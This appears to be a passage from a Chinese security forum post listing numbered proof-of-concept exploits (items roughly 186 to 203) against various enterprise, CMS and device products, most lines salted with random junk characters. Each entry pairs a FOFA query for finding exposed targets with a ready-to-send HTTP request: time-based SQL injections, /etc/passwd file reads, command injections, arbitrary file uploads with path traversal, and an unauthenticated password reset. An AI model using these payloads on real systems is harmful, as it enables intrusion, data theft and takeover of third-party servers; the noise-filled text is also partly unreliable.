# u) X0 r3 b8 g# Y# K2 J: rF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统( W# @ G7 z5 G
FOFA:title=="DataCube3"2 m( G/ I" G' L( h9 A
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
- a1 m( Y: z: S# l$ XHost: your-ip9 l: v5 U7 p/ _. \* i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0( ^3 O. o0 @+ u( s: N% d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
9 N3 v- ^! i% w& KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, F6 E' e; }0 s" u" f9 {
Accept-Encoding: gzip, deflate( k; N) {$ b) a2 d
Connection: close
( t1 W) a. x2 Y( m* w; lContent-Type: application/x-www-form-urlencoded- [9 L7 k$ u. E. g3 \- H1 l* Q
- C( L# i. ^. w
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450+ ]1 c. {1 X+ e4 k7 Z& l
& S; ]$ ^% \0 F2 j' B
/ Y9 a& q' z& d6 u9 ^! K187. Mura CMS processAsyncObject SQL注入
! r- W- u) t8 n+ Y+ x! [CVE-2024-32640: x+ s7 n% |4 u9 }6 x9 s, [
FOFA:"Mura CMS"
# S7 x8 T2 @$ Q# {% `, `POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
' C( a0 H( c( Y3 J" qHost: your-ip
: c6 ?! E/ q& Y' S; J, iContent-Type: application/x-www-form-urlencoded9 N; D. T( A% B$ U: L1 y$ h
( @+ T! Q. W. N! F# w
4 Y* ^0 u6 [' X5 r2 z) wobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
6 b9 d7 z8 d9 J+ _$ f4 y4 C
) O+ I$ c6 n! E1 z. b! ~: T4 Q
. v+ H" j: x* E188. 叁体-佳会视频会议 attachment 任意文件读取
6 L0 Z* n5 d5 ~, \* [3 ^7 u2 lversion <= 3.9.7. m) k, N$ G" ^' e5 G4 k+ z
FOFA:body="/system/get_rtc_user_defined_info?site_id"
( A5 }( E1 c( }) l* U3 ~GET /attachment?file=/etc/passwd HTTP/1.14 T% f9 J0 ^8 o0 b4 W" D
Host: your-ip, {2 m; P* }1 _" M; {; j" o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% s7 R! D2 S9 s% ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: N" L$ f0 n3 p$ |# e7 M
Accept-Encoding: gzip, deflate
9 s6 F9 H- ^& E. H. u/ R4 @Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 L* }4 W2 N w$ a, i8 ?2 A! a
Connection: close
2 S% Z% c* V. M1 r/ W3 x4 l, k! S0 p. @; z8 j+ w
- d% ]# i% m, _( o& Q
189. 蓝网科技临床浏览系统 deleteStudy SQL注入' S# \/ y3 B. t9 i3 L* }$ [
FOFA:app="LANWON-临床浏览系统"" E& @( R$ @. z! `6 p) E6 q
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1* ~; K4 t0 N8 E k! Q+ ]4 D$ w: Y
Host: your-ip% | z: ^0 k% C1 I$ {
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. n& J0 B4 N. w v7 o8 _( aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) P$ l, t6 P1 H3 h: E- [
Accept-Encoding: gzip, deflate
& v1 k; J- A1 k! J, c& tAccept-Language: zh-CN,zh;q=0.9
9 @9 O! B: ~$ n0 s2 B. w+ D' cConnection: close9 C, q& V( N0 V0 i2 o5 O9 x* H
- K% |# O1 g& g+ i V' ^% N0 ?
( S+ ]' K7 n) w. H( ?( A% v3 J! t1 O
190. 短视频矩阵营销系统 poihuoqu 任意文件读取8 f& d8 d9 Q( |3 p* k1 i
FOFA:title=="短视频矩阵营销系统"
0 q" N L* C6 l4 qPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
1 V6 Q# f, Z- ^: k! bHost: your-ip* ?, ^6 G2 E9 m9 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.366 s- X: A+ E2 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 s6 O6 {8 U) p3 S
Content-Type: application/x-www-form-urlencoded
9 k+ p# h* @3 i3 P% v* `Accept-Encoding: gzip, deflate
! \/ Q& a! M6 Y2 U( LAccept-Language: zh-CN,zh;q=0.9
9 b% o( I$ l- z, ^6 w
0 _+ F; f& _2 }8 i/ Kpoi=file:///etc/passwd
* T5 o" p3 ^" e4 r1 a
1 W, m7 G& h2 ~( y; i* ?5 A% I. H# f
. S- ?. j4 Z; D191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
+ g, M& V* t; i; V4 [. f! rFOFA:body="/CDGServer3/index.jsp"8 L3 ?( m" r5 K C: s+ v
POST /CDGServer3/js/../NavigationAjax HTTP/1.1% p, {6 L& @- {% R+ W; E2 L1 K |
Host: your-ip2 H6 U# e7 A7 f. U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 J$ w9 x+ p) h$ U8 UContent-Type: application/x-www-form-urlencoded
; m* U# P6 [- z! x M/ M
* z9 ]5 a% U* f' R) gcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
( H. z9 H! r$ M
* x, C z$ a2 ?2 g7 b& Y: {3 M6 b8 E: h: N
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
- f: Z8 g$ A5 T5 ~) x2 F6 y# ~FOFA:title="用户登录_富通天下外贸ERP"7 @* W. B( H7 G, i
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.17 }5 C/ Z3 T. f* A( f7 X1 J
Host: your-ip
- `: k6 `! M) R5 A- }: k8 {; TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36' {. I: e4 }, b% Q) H9 s
Content-Type: application/x-www-form-urlencoded
6 y; w" b+ m4 ?2 c3 e2 u, c7 |2 D1 C t( u
' f5 c1 }0 W! m<% @ webhandler language="C#" class="AverageHandler" %>1 }" t2 Z- f) f
using System;: o0 b$ } G. V$ Q* `
using System.Web;
+ y, F2 t6 l* t0 s2 A# u6 ypublic class AverageHandler : IHttpHandler) }) w6 O4 N, Q! Q& a
{2 |4 N3 n7 u* \$ b! p
public bool IsReusable
7 L" v' D2 i$ v{ get { return true; } }
5 G6 @- B( I( N& R/ O% O. |public void ProcessRequest(HttpContext ctx)& K2 M. G- H7 z6 N4 Y# C
{
( Q0 j F! E$ N, @- bctx.Response.Write("test");) J- o; M1 u0 X7 V k# C+ g
}, G/ A+ R7 k# ]2 Z% }! E* U
}
' H- i$ y7 A5 @. t3 K4 f
- P5 I8 l( s; M& t* K( T, A5 ^: S7 r7 F3 m2 }: R- U+ {
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
, }6 I9 F/ e- r* HFOFA:body="山石云鉴主机安全管理系统". Z' q/ N4 B) N9 ]+ I
GET /master/ajaxActions/getTokenAction.php HTTP/1.1 l/ Q1 _; o/ |4 {9 I# d; R
Host:
( f6 C; C* D6 w4 SCookie: PHPSESSID=2333333333333;
! A& I- |! ?3 b: P5 }Content-Type: application/x-www-form-urlencoded1 H5 k9 ]9 z7 o$ A+ k
User-Agent: Mozilla/5.0
( b0 @" g2 c6 j! i- _1 I
' D3 n% }# H( h5 J8 |
' y J9 k9 \. A7 IPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1- R5 X1 t4 V# G4 @; |/ \. b
Host:
$ ~$ c3 c1 k9 J$ VUser-Agent: Mozilla/5.0; M8 d5 d: J+ b0 z! |) f
Accept-Encoding: gzip, deflate; [ H" l6 v, |, S7 t
Accept: */*
5 z7 v" O' W VConnection: close
3 U" z' u4 F/ SCookie: PHPSESSID=2333333333333;
9 x- s, n8 k9 E3 p/ vContent-Type: application/x-www-form-urlencoded- N- U) K* `$ C6 |/ @' c/ [* `, n! D
Content-Length: 84+ e4 o# g: ^3 g" f
; K2 `! d+ r ?0 q; t, F
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')+ g, b, V& M% Q& f I; R- p
7 M1 M* n; Q; J: j1 \$ `8 i
, M( o4 ` X: K( [* ~GET /master/img/config HTTP/1.18 Y) o; d# l P9 _
Host:
/ Z) Y; |1 B. a- y9 g& q, CUser-Agent: Mozilla/5.0
) f! X# [/ P% l/ ] s. [% d, a
# k( G, }; s* s1 {) v3 P0 t* V& Z$ V3 G
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传" Y& _6 G0 N: X. D1 Q" T/ r
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
8 A/ h( z2 y8 D/ T) G0 k9 p5 J( U1 e$ }9 o* [" T" G( Z+ e9 j+ I; I
POST /servlet/uploadAttachmentServlet HTTP/1.1- A x1 d7 q: _; f) g" T( } z" M
Host: host* [: t" \0 S% T8 t3 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
: I% ?2 l2 s8 X+ h9 ]+ RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 g ?' ~3 |8 y* N2 N& CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- K8 C- y( F8 v' LAccept-Encoding: gzip, deflate
, x: n) Q$ x( [% H6 OConnection: close
/ { E2 n: A+ t ^( z! WContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk3 K4 J' H" M* ]0 Y* K
------WebKitFormBoundaryKNt0t4vBe8cX9rZk' K4 V. S$ f+ v6 _0 d
+ C! d6 g# b' t/ y$ iContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"! q0 u' x; F {4 j" E+ D
Content-Type: text/plain$ h9 _' ~1 b/ ~# q
<% out.println("hello");%>
* r, E9 I; a& y9 y1 R) y------WebKitFormBoundaryKNt0t4vBe8cX9rZk
* x/ J# g( u8 E" L* X. ^' tContent-Disposition: form-data; name="json"
/ A% S9 L9 X# U) W6 B {"iq":{"query":{"UpdateType":"mail"}}}
( G% X# w# o# v$ o% \------WebKitFormBoundaryKNt0t4vBe8cX9rZk--8 E) d! K" k3 n+ b0 M, _
; M2 A" U5 p R5 r6 E
5 l. \6 C, l( N$ J( B, N+ ~
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
/ M' [, C* k% R9 ?1 uFOFA:title=="飞鱼星企业级智能上网行为管理系统4 ~6 G g3 ?8 n8 ?* @+ |
POST /send_order.cgi?parameter=operation HTTP/1.11 a8 g' t Y2 [! ?; W
Host: 127.0.0.1* a; k! I" I8 F) b/ k6 Q. j6 s
Pragma: no-cache% Q$ J; N1 J. O7 _# T
Cache-Control: no-cache
9 o6 \5 d0 H) n6 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! \$ Z, c$ j, H# y9 U5 I: Z/ \
Accept: */** i) q$ t/ f8 N0 }/ E# ^
Accept-Encoding: gzip, deflate+ ]+ V$ S7 E& f9 W
Accept-Language: zh-CN,zh;q=0.90 H, Y) n( ?* H$ Q. I; y
Connection: close
( d8 `( f+ Z+ sContent-Type: application/x-www-form-urlencoded- } p y! ~ u; a! a3 J. F
Content-Length: 68
" U. x6 M, p/ _) |( \
, ~* U7 M y0 \. d$ p3 e{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}0 ~& m% N7 E3 A# l4 `
8 z. w- s7 Z; a1 r) F+ [! m2 e
" o0 K; b4 q; h9 g0 D& ?196. 河南省风速科技统一认证平台密码重置$ X. [8 ~: {4 @- v; n
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
; C W/ Y% _4 P5 MPOST /cas/userCtl/resetPasswordBySuper HTTP/1.14 ]* B1 l% C! W9 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, A4 j0 c3 ^1 W
Content-Type: application/json;charset=UTF-8- t- b3 a; ^$ A0 V/ N
X-Requested-With: XMLHttpRequest, s B0 D, t9 @5 R
Host:: _. E7 R" v; w/ g% k
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
. F7 u' e; X( f2 @/ u& ?Content-Length: 457 ~( i; Q6 X7 u! A4 u
Connection: close
7 r) ~* S& G) C& B S' K; d) m
8 e8 P! p; w- \( K% X, z2 e{"xgh":"test","newPass":"test666","email":""}
3 @) c; O5 ]% D1 t9 b6 G
6 W; M6 J2 t3 D: C$ A* J" I% r
" p: d+ A' I2 O+ V9 Y3 e- ]* H% w3 o. i5 `1 o
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
* R) J* J" _6 k f) Q: r' _FOFA:app="浙大恩特客户资源管理系统"
2 T+ b) \/ E' }6 U2 i1 Y1 w( p. R% VGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
* Q- |4 H0 }& ~Host:
+ e/ m1 ~; D3 m1 w [- l, T NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.365 G, m. k7 M+ a1 F6 x' U
Accept-Encoding: gzip, deflate
2 l. D) b9 m r# }1 o3 AConnection: close/ g, R& K$ R1 i# K( y# o4 R3 n& y4 F
! C. ?9 ^" c; i" Q$ t7 F% l1 |# T
- H1 X- y& O2 }/ G, g1 w6 o/ Y
198. 阿里云盘 WebDAV 命令注入. w k# C# S" U
CVE-2024-29640: ^8 Q q9 v" ]) E
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
" z7 M- a" L- B4 lCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
& g5 I9 k2 G+ |/ k0 hAccept: */*
- k, ~; s" G$ G; y2 r& u2 HAccept-Encoding: gzip, deflate1 j8 [, w: @" k+ B' g0 n1 h
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.61 _- ~* S3 F2 |7 O) w+ v& [
Connection: close1 |. V1 g) g* O$ z9 P
6 m2 G7 q" r- x& y1 D+ L* V' ` p
, e; H: O$ L% D0 ~8 D/ W9 Z
199. cockpit系统assetsmanager_upload接口 文件上传
: r- m( }+ b% I$ ~ Q+ c% m; S7 D9 X j; ^/ A9 M
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:. p" B# M4 U/ V) h; L: \9 n
GET /auth/login?to=/ HTTP/1.1
8 N8 ?* B8 L/ r4 n/ u" e2 O, n# m! c/ ]* o: q9 K2 H
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"+ @, g5 Q9 c9 W9 a; c
6 j5 t: w5 v6 ]( p- ?2.使用刚才上一步获取到的jwt获取cookie:
0 M- N1 u, c) G2 {. S( x# F" u) d3 \0 T& \( B
POST /auth/check HTTP/1.1 b; d% X W8 ?7 F
Content-Type: application/json
1 V5 }: t4 U1 c; [4 l) }$ R' F. c8 l7 z* X+ E2 \
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
4 {* D9 }5 M, b. }. g/ O; i% m) {4 Z: Y" A% d9 e P5 u
响应:200,返回值:! k2 I/ p. K( N3 E
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
; ?* o$ e1 k% ?4 N7 r* z. cFofa:title="Authenticate Please!"
# Z9 O. c7 C; g, ~9 G5 q# QPOST /assetsmanager/upload HTTP/1.1' k" P) K; k' q
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
$ X) b( S; r- N2 x' u" } }Cookie: mysession=95524f01e238bf51bb60d77ede3bea92! W. w8 g) {9 s
6 N( B3 q: U* |9 k-----------------------------36D28FBc36bd6feE7Fb3: x4 ^& f: s' Z9 i
Content-Disposition: form-data; name="files[]"; filename="tttt.php", X0 w6 U) a$ x$ b' z% G0 G G7 R
Content-Type: text/php% r1 Y" v) n B0 M8 R# J; t
7 U0 ^" n, {; b4 a* x<?php echo "tttt";unlink(__FILE__);?>0 @( v) l; o6 Y( C
-----------------------------36D28FBc36bd6feE7Fb3: Q. ?( z2 X+ p0 L. y+ q
Content-Disposition: form-data; name="folder", d* m% W; E2 i; D* ? i2 B
1 x0 U/ K8 R; ~ i8 B, x-----------------------------36D28FBc36bd6feE7Fb3--
3 L) s# h* Z# M- \9 y1 b5 T) E {$ D" H1 W. W$ j$ t# H
1 D i! L; T0 k9 b, H
/storage/uploads/tttt.php, Z2 s" [( [; u7 G5 U, I
0 Z1 b e$ v T6 i: [4 j9 [200. SeaCMS海洋影视管理系统dmku SQL注入* N' }; K( A: p" X
FOFA:app="海洋CMS"/ r$ i$ v+ E/ u" y6 }) C `
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1- ? t8 B/ A/ y) }+ }* n
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s7 `' B/ n% y( a% {; t
Upgrade-Insecure-Requests: 17 u. x# h: l, }6 ]
Cache-Control: max-age=0
2 I) d, a. P6 b/ E1 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 [+ o" }/ ~! w; |- OAccept-Encoding: gzip, deflate4 v8 k, V1 O' H6 ]- J* u" N
Accept-Language: zh-CN,zh;q=0.9- o0 t, G. E: T6 n* i
5 k6 j Y$ ~9 l4 I& C% U* O, ~, Z N
) C7 E1 V2 H7 p* T Z% \
201. 方正全媒体新闻采编系统 binary SQL注入% A: g/ r+ a; M( ?7 k/ y" r
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
% f U0 ~ p0 f j4 YPOST /newsedit/newsplan/task/binary.do HTTP/1.1' G6 B1 A: ?) \ K4 N# Q+ C& W
Content-Type: application/x-www-form-urlencoded
5 s0 C/ o! l' sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 D% }" K+ W: g% S9 z; c1 r, ^
Accept-Encoding: gzip, deflate1 Y; F6 \2 B4 K" X. p
Accept-Language: zh-CN,zh;q=0.9
3 B: H$ X$ d Q1 {/ wConnection: close5 N& {' _) Y! m; c( T; z
6 n6 c/ y. [9 M) ?- J! |2 E
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
& a6 ` F7 |( W: n. P
1 L6 l* T: B6 \2 |7 n
% G5 g. e! g! `* [! R6 U202. 微擎系统 AccountEdit任意文件上传$ a( c4 b6 o, M2 g) F, i9 x7 W
FOFA:body="/Widgets/WidgetCollection/"
6 d( q( T, {" i; Q# e1 J* M& V8 \获取__VIEWSTATE和__EVENTVALIDATION值5 g+ F4 [+ A& v0 \) m* A
GET /User/AccountEdit.aspx HTTP/1.1! A) S, l" d, ?7 l% s/ d' n
Host: 滑板人之家
; f' q6 m2 E/ e) F- J+ `0 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
g& u( W8 B. a2 B0 e2 xContent-Length: 0
9 D+ d' b0 m9 v! W+ W" i2 ^4 H: I; \4 R4 A& ^1 V% ? K) O
/ Y( i9 ^: `# O
替换__VIEWSTATE和__EVENTVALIDATION值
: A2 T2 i" ]# t5 `POST /User/AccountEdit.aspx HTTP/1.19 g# K' W' [) [$ ?3 L' |/ i
Accept-Encoding: gzip, deflate, br4 T7 i+ i* \5 v7 C9 Q/ t. R' ~0 F
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
& c0 r+ y, A/ y' s! M6 U- n2 g* y( T% k/ F$ X$ e
-----------------------------786435874t38587593865736587346567358735687
: }) M1 z0 S9 f f0 n( DContent-Disposition: form-data; name="__VIEWSTATE"3 |, {( [' m m2 q; O! r
E, V! _: X$ g' f5 E__VIEWSTATE% P) k5 _ U. R R2 T
-----------------------------786435874t38587593865736587346567358735687
3 _8 }3 K: z3 F9 ]* {Content-Disposition: form-data; name="__EVENTVALIDATION"3 u) C) ]* a: n5 y
& F) E3 W2 v5 j6 o0 @__EVENTVALIDATION: g& J) _) @" T3 ]
-----------------------------786435874t38587593865736587346567358735687" W8 p6 f. n. y- ?7 U4 U& G2 j* g
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt" H6 q- V' h$ @+ z1 Z1 d% ?8 P
Content-Type: text/plain
4 Q# u( H6 N% ^4 M/ y6 I4 g: v* p- C5 N( u& r; g
Hello World!" A8 x8 K* h u" u
-----------------------------786435874t38587593865736587346567358735687
- S: b: T: b/ ^8 c; c& U0 X& ]4 f n# yContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
& C3 x; m. G. W
; o3 Y0 l( ?' u; U+ Z0 H上传图片
/ S1 ] B: J) |2 F l-----------------------------786435874t38587593865736587346567358735687
; _' w" R) m7 @$ }Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName" a L- w6 @$ C
9 |# v" m, g% B' F: \7 A
/ |5 {- W3 ^* B. i-----------------------------786435874t38587593865736587346567358735687
2 w: h {; l6 ?5 gContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
4 g6 N7 C* F4 x' V+ g# Y
$ r- F0 D$ W, O. V Y& {, @% {
. b# \! O5 T3 j' A-----------------------------786435874t38587593865736587346567358735687--0 R' Y0 q! V+ I) q* ]2 P
. Z: p* B/ {2 o0 k8 o+ h( ]7 m. T- p0 q( a
/_data/Uploads/1123.txt+ I H8 j& Q: [- o2 g) ^
* m3 d% j9 C4 n$ ?4 D" U4 t
203. 红海云EHR PtFjk 文件上传
5 R+ D) M/ g! q0 q* j2 O4 UFOFA:body="RedseaPlatform"% x3 W: f- v8 a) T! d: s
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
% }4 T% @1 t5 EHost: x.x.x.x
3 J1 W2 Q8 Q+ C: m* RAccept-Encoding: gzip
% y J: f- @* ^ _8 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- f' R- M9 N' M% [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4! \# w: w3 b7 M" Z g
Content-Length: 210
% H! v/ S1 G2 _' h0 v8 H: }3 l8 H/ ~! ? l6 ?
------WebKitFormBoundaryt7WbDl1tXogoZys4
. {) r+ L! s& a: @4 kContent-Disposition: form-data; name="fj_file"; filename="11.jsp"" {& |$ t$ ]9 a9 H1 T
Content-Type:image/jpeg) k) G4 h- F2 j% b% s( [
L3 F5 E2 ?8 j0 z) O" `<% out.print("hello,eHR");%>4 W& c. j$ } R/ ?( D+ u, G( [* p. F
------WebKitFormBoundaryt7WbDl1tXogoZys4--9 p- L3 \7 c+ k( _& x
2 {2 L) M, |4 Y: G' ]5 v
" v' n6 d; C1 C3 W! k6 m8 |1 e- ]8 |! i( b& _5 |
, |+ K! b# R) `5 F" D0 u$ [1 p
0 y' Z' x! t5 D9 K0 [" r; A) O( W I9 O8 l% s4 K8 e" @& w
|
发表于 2024-6-5 14:31:29
收藏
支持
反对